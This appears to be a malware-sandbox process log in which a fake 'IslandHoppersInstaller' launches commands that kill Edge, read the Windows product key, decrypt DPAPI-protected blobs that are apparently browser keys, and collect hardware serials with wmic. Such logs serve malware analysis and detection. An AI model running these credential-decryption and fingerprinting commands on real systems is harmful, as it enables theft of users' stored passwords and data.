"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6320 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7000 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7148 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6560 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7124 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7552 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7684 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7964 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7972 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8756 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5508 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7164 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9620 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9764 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9960 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10144 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10152 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8264 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10392 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Downloads\DebugConvertFrom.gif

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10124 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9940 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7028 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1588 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1852,14509727161626578567,9686471228261804075,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7084 /prefetch:8

C:\Users\Admin\Downloads\IslandHoppersInstallerv1.3.0.exe

"C:\Users\Admin\Downloads\IslandHoppersInstallerv1.3.0.exe"

C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe

"C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"

C:\Windows\system32\taskkill.exe

taskkill /IM msedge.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,65,118,227,64,90,91,24,70,140,186,76,54,175,210,229,59,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,187,139,228,201,250,249,3,150,52,200,184,10,188,243,86,4,131,133,137,25,241,118,55,118,174,116,149,125,151,194,45,119,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,56,124,204,127,25,47,119,101,62,173,223,209,90,243,38,159,77,101,170,32,241,212,130,163,244,129,241,6,150,4,157,97,48,0,0,0,69,21,113,110,241,21,251,104,71,169,192,14,164,64,13,234,88,64,200,139,166,198,3,241,101,167,94,107,37,109,79,190,179,152,229,75,203,184,25,160,1,9,24,162,128,15,153,96,64,0,0,0,17,187,109,56,84,239,80,225,55,214,215,77,8,84,49,207,178,78,35,103,54,167,98,198,83,92,44,72,192,195,191,79,169,211,144,160,68,185,172,23,110,25,32,37,168,197,207,54,251,47,144,10,111,74,3,238,35,16,223,203,162,1,144,228), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,65,118,227,64,90,91,24,70,140,186,76,54,175,210,229,59,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,187,139,228,201,250,249,3,150,52,200,184,10,188,243,86,4,131,133,137,25,241,118,55,118,174,116,149,125,151,194,45,119,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,56,124,204,127,25,47,119,101,62,173,223,209,90,243,38,159,77,101,170,32,241,212,130,163,244,129,241,6,150,4,157,97,48,0,0,0,69,21,113,110,241,21,251,104,71,169,192,14,164,64,13,234,88,64,200,139,166,198,3,241,101,167,94,107,37,109,79,190,179,152,229,75,203,184,25,160,1,9,24,162,128,15,153,96,64,0,0,0,17,187,109,56,84,239,80,225,55,214,215,77,8,84,49,207,178,78,35,103,54,167,98,198,83,92,44,72,192,195,191,79,169,211,144,160,68,185,172,23,110,25,32,37,168,197,207,54,251,47,144,10,111,74,3,238,35,16,223,203,162,1,144,228), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,65,118,227,64,90,91,24,70,140,186,76,54,175,210,229,59,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,124,33,230,177,155,163,191,120,106,96,217,164,186,156,233,189,33,12,59,85,74,89,216,159,145,5,183,37,212,105,228,249,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,163,123,12,209,104,80,51,164,79,110,37,21,19,218,70,144,23,149,218,57,253,47,12,108,201,246,154,230,51,204,189,51,48,0,0,0,220,38,18,178,228,79,29,150,249,18,143,151,58,62,4,228,125,226,68,37,72,14,184,1,91,188,237,128,85,122,239,247,58,28,173,154,165,223,4,255,29,128,22,190,180,43,98,165,64,0,0,0,104,116,170,164,7,33,137,82,205,20,102,203,146,189,88,92,9,184,170,237,14,63,35,12,59,150,140,83,173,104,112,148,180,123,114,163,225,162,203,243,171,234,152,101,129,222,102,232,148,83,63,117,187,52,72,102,239,137,119,236,89,154,25,234), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,65,118,227,64,90,91,24,70,140,186,76,54,175,210,229,59,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,124,33,230,177,155,163,191,120,106,96,217,164,186,156,233,189,33,12,59,85,74,89,216,159,145,5,183,37,212,105,228,249,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,163,123,12,209,104,80,51,164,79,110,37,21,19,218,70,144,23,149,218,57,253,47,12,108,201,246,154,230,51,204,189,51,48,0,0,0,220,38,18,178,228,79,29,150,249,18,143,151,58,62,4,228,125,226,68,37,72,14,184,1,91,188,237,128,85,122,239,247,58,28,173,154,165,223,4,255,29,128,22,190,180,43,98,165,64,0,0,0,104,116,170,164,7,33,137,82,205,20,102,203,146,189,88,92,9,184,170,237,14,63,35,12,59,150,140,83,173,104,112,148,180,123,114,163,225,162,203,243,171,234,152,101,129,222,102,232,148,83,63,117,187,52,72,102,239,137,119,236,89,154,25,234), $null, 'CurrentUser')

C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe

"C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\IslandHoppersInstallerv1.3.0" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1940 --field-trial-handle=1944,i,1381989949723893370,14097480826959508823,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name"

C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe

"C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\IslandHoppersInstallerv1.3.0" --mojo-platform-channel-handle=2324 --field-trial-handle=1944,i,1381989949723893370,14097480826959508823,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get ProcessorId"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get ProcessorId

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get Product"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get Product

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get SerialNumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get SerialNumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get TotalPhysicalMemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get TotalPhysicalMemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_videocontroller get caption,PNPDeviceID"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_videocontroller get caption,PNPDeviceID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get SerialNumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get SerialNumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe

"C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,65,118,227,64,90,91,24,70,140,186,76,54,175,210,229,59,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,187,139,228,201,250,249,3,150,52,200,184,10,188,243,86,4,131,133,137,25,241,118,55,118,174,116,149,125,151,194,45,119,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,56,124,204,127,25,47,119,101,62,173,223,209,90,243,38,159,77,101,170,32,241,212,130,163,244,129,241,6,150,4,157,97,48,0,0,0,69,21,113,110,241,21,251,104,71,169,192,14,164,64,13,234,88,64,200,139,166,198,3,241,101,167,94,107,37,109,79,190,179,152,229,75,203,184,25,160,1,9,24,162,128,15,153,96,64,0,0,0,17,187,109,56,84,239,80,225,55,214,215,77,8,84,49,207,178,78,35,103,54,167,98,198,83,92,44,72,192,195,191,79,169,211,144,160,68,185,172,23,110,25,32,37,168,197,207,54,251,47,144,10,111,74,3,238,35,16,223,203,162,1,144,228), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,65,118,227,64,90,91,24,70,140,186,76,54,175,210,229,59,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,187,139,228,201,250,249,3,150,52,200,184,10,188,243,86,4,131,133,137,25,241,118,55,118,174,116,149,125,151,194,45,119,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,56,124,204,127,25,47,119,101,62,173,223,209,90,243,38,159,77,101,170,32,241,212,130,163,244,129,241,6,150,4,157,97,48,0,0,0,69,21,113,110,241,21,251,104,71,169,192,14,164,64,13,234,88,64,200,139,166,198,3,241,101,167,94,107,37,109,79,190,179,152,229,75,203,184,25,160,1,9,24,162,128,15,153,96,64,0,0,0,17,187,109,56,84,239,80,225,55,214,215,77,8,84,49,207,178,78,35,103,54,167,98,198,83,92,44,72,192,195,191,79,169,211,144,160,68,185,172,23,110,25,32,37,168,197,207,54,251,47,144,10,111,74,3,238,35,16,223,203,162,1,144,228), $null, 'CurrentUser')

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

